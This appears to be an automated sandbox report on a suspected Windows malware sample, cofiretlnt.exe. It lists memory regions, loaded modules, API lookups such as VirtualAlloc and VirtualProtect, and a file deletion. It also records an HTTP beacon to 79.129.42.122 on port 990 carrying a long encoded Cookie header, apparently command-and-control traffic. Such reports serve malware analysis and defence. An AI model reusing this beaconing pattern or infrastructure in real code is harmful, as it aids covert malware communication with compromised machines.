|
- |
| private_0x0000000000690000 | 0x00690000 | 0x0078ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000790000 | 0x00790000 | 0x00917fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000920000 | 0x00920000 | 0x00aa0fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x00ab0000 | 0x00d7efff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000d80000 | 0x00d80000 | 0x00ddffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e10000 | 0x00e10000 | 0x00f0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f10000 | 0x00f10000 | 0x0100ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001010000 | 0x01010000 | 0x0119ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001040000 | 0x01040000 | 0x0107ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000010a0000 | 0x010a0000 | 0x010dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001160000 | 0x01160000 | 0x0119ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001240000 | 0x01240000 | 0x0133ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001360000 | 0x01360000 | 0x0139ffff | Private Memory | rw |
|
|
|
- |
| cofiretlnt.exe | 0x013c0000 | 0x013e2fff | Memory Mapped File | rwx |
|
|
|
|
| pagefile_0x00000000013f0000 | 0x013f0000 | 0x027effff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000028b0000 | 0x028b0000 | 0x029affff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002a70000 | 0x02a70000 | 0x02b6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002b70000 | 0x02b70000 | 0x02d5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002b70000 | 0x02b70000 | 0x02d2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002bd0000 | 0x02bd0000 | 0x02ccffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002d50000 | 0x02d50000 | 0x02d5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002e30000 | 0x02e30000 | 0x02f2ffff | Private Memory | rw |
|
|
|
- |
| dwmapi.dll | 0x73420000 | 0x73432fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x73440000 | 0x734bffff | Memory Mapped File | rwx |
|
|
|
- |
| esent.dll | 0x73660000 | 0x73802fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x73810000 | 0x73817fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73820000 | 0x7387bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73880000 | 0x738befff | Memory Mapped File | rwx |
|
|
|
- |
| fwpuclnt.dll | 0x74600000 | 0x74637fff | Memory Mapped File | rwx |
|
|
|
- |
| rasadhlp.dll | 0x74640000 | 0x74645fff | Memory Mapped File | rwx |
|
|
|
- |
| wship6.dll | 0x74650000 | 0x74655fff | Memory Mapped File | rwx |
|
|
|
- |
| wshtcpip.dll | 0x74660000 | 0x74664fff | Memory Mapped File | rwx |
|
|
|
- |
| winrnr.dll | 0x74670000 | 0x74677fff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x74680000 | 0x746bbfff | Memory Mapped File | rwx |
|
|
|
- |
| pnrpnsp.dll | 0x746c0000 | 0x746d1fff | Memory Mapped File | rwx |
|
|
|
- |
| napinsp.dll | 0x746e0000 | 0x746effff | Memory Mapped File | rwx |
|
|
|
- |
| npmproxy.dll | 0x74700000 | 0x74707fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrtremote.dll | 0x74720000 | 0x7472dfff | Memory Mapped File | rwx |
|
|
|
- |
| netprofm.dll | 0x74730000 | 0x74789fff | Memory Mapped File | rwx |
|
|
|
- |
| nlaapi.dll | 0x74790000 | 0x7479ffff | Memory Mapped File | rwx |
|
|
|
- |
| sensapi.dll | 0x747a0000 | 0x747a5fff | Memory Mapped File | rwx |
|
|
|
- |
| rtutils.dll | 0x747b0000 | 0x747bcfff | Memory Mapped File | rwx |
|
|
|
- |
| rasman.dll | 0x747c0000 | 0x747d4fff | Memory Mapped File | rwx |
|
|
|
- |
| rasapi32.dll | 0x747e0000 | 0x74831fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x74840000 | 0x74846fff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x74850000 | 0x7486bfff | Memory Mapped File | rwx |
|
|
|
- |
| dnsapi.dll | 0x74870000 | 0x748b3fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x748c0000 | 0x748e0fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x748f0000 | 0x74a8dfff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x74a90000 | 0x74acafff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x74ad0000 | 0x74ae5fff | Memory Mapped File | rwx |
|
|
|
- |
| wtsapi32.dll | 0x74af0000 | 0x74afcfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x74b00000 | 0x74b0afff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x74b10000 | 0x74b26fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74c30000 | 0x74c3bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74c40000 | 0x74c9ffff | Memory Mapped File | rwx |
|
|
|
- |
| normaliz.dll | 0x74d30000 | 0x74d32fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x74db0000 | 0x74f0bfff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x74f40000 | 0x75075fff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x75080000 | 0x7519cfff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x751a0000 | 0x75294fff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x75320000 | 0x75354fff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x75360000 | 0x753eefff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x75420000 | 0x75425fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x75430000 | 0x7551ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75570000 | 0x7560ffff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x757b0000 | 0x75832fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75840000 | 0x76489fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76490000 | 0x7655bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76560000 | 0x7660bfff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x76610000 | 0x7661bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76620000 | 0x7672ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76730000 | 0x767bffff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x767c0000 | 0x7685cfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76860000 | 0x76878fff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x76880000 | 0x768c4fff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x768d0000 | 0x76926fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x76930000 | 0x76975fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76980000 | 0x76a7ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x76a80000 | 0x76adffff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x76ae0000 | 0x76cdafff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000076ce0000 | 0x76ce0000 | 0x76dfefff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000076e00000 | 0x76e00000 | 0x76ef9fff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x76f00000 | 0x770a8fff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x770b0000 | 0x770b4fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x770e0000 | 0x7725ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efa4000 | 0x7efa4000 | 0x7efa6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efa7000 | 0x7efa7000 | 0x7efa9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (1)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Delete | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe | - |
|
1 |
Module (28)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | msvcrt.dll | base_address = 0x76560000 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x76620000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x75570000 |
|
1 | |
| Load | crypt32.dll | base_address = 0x75080000 |
|
1 | |
| Load | wininet.dll | base_address = 0x751a0000 |
|
1 | |
| Get Handle | c:\users\aetadzjz\appdata\local\microsoft\windows\cofiretlnt.exe | base_address = 0x13c0000 |
|
1 | |
| Get Filename | - | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\cofiretlnt.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\cofiretlnt.exe, size = 260 |
|
1 | |
| Get Address | - | function = GetBinaryTypeW, ordinal = 0, address_out = 0x34f83c |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x34f704 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x34f754 |
|
1 | |
| Get Address | - | function = GetProcAddress, ordinal = 0, address_out = 0x34f7b4 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x34f7b4 |
|
1 | |
| Get Address | - | function = VirtualProtect, ordinal = 0, address_out = 0x34f7b4 |
|
1 | |
| Get Address | - | function = LoadLibraryA, ordinal = 0, address_out = 0x34f7b4 |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = free, address_out = 0x76569894 |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = malloc, address_out = 0x76569cee |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x7710e026 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeConsole, address_out = 0x766d6aa8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x766311f8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenW, address_out = 0x76631700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x76631809 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThread, address_out = 0x766317ec |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpA, address_out = 0x7664eceb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x766314e9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpW, address_out = 0x76635929 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x766314c9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x766311c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcpyW, address_out = 0x76653102 |
|
1 |
Service (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 |
Window (1)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | - | class_name = LDWCN705BA84C, wndproc_parameter = 0 |
|
1 |
System (22)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Get Time | type = System Time, time = 2018-11-26 15:56:40 (UTC) |
|
3 | |
| Get Time | type = Ticks, time = 21091 |
|
3 | |
| Get Time | type = Ticks, time = 22105 |
|
1 | |
| Get Time | type = Ticks, time = 23119 |
|
1 | |
| Get Time | type = Ticks, time = 24133 |
|
1 | |
| Get Time | type = Ticks, time = 25147 |
|
1 | |
| Get Time | type = Ticks, time = 25209 |
|
2 | |
| Get Time | type = Ticks, time = 26161 |
|
1 | |
| Get Time | type = Ticks, time = 27175 |
|
1 | |
| Get Time | type = Ticks, time = 28189 |
|
1 | |
| Get Time | type = Ticks, time = 29203 |
|
1 | |
| Get Time | type = Ticks, time = 30217 |
|
1 | |
| Get Time | type = Ticks, time = 31231 |
|
3 |
Mutex (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Release | - |
|
1 |
Network Behavior
HTTP Sessions (1)
| Information | Value |
|---|---|
| Total Data Sent | 339 bytes |
| Total Data Received | 0 bytes |
| Contacted Host Count | 1 |
| Contacted Hosts | 79.129.42.122 |
HTTP Session #1
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 79.129.42.122 |
| Server Port | 990 |
| Data Sent | 339 |
| Data Received | 0 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 79.129.42.122, server_port = 990 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = Cookie: 31293=dp9OEJiH44KQSqKhhEvGQsvYKnEk5KQ9Zei3C7i9ZDJjRicqQCWu+eOWwaq4eLc1Mjhctg34+NyjlZ8pHHLPkmqJgSZf9q3InQ+ZPYy4cHok6F6uONIM8x1R8Co5KnOWIciVtX4Vhw1liEeWjWqMR4T9G9Jl2prT5szDD3DEajdMapaW+MqNOqSwDwEHcOEv+A80zAshK3ksJg0DboZy4l0/aLUIigDffRvAVuS60Eqe3Ue20iKRpkSTBYsIcWyWNAjw3eLLf4RwOeVkFf0oJuO5Ymu0vh+8ysJu9xj87pMo0nlPPnwomwfe9tpuRjHNrMoJ0AKOl+A/nWQ3JxBnVlyygNr0G0alhSwQJk2o4TXBDUstpp7YwWUZzDDeRDhlDpMUOVSgZOi1MzSFppV1sT7G9sA7e4uwwqN0yQETaxn7OI8e, url = 79.129.42.122 |
|
1 |
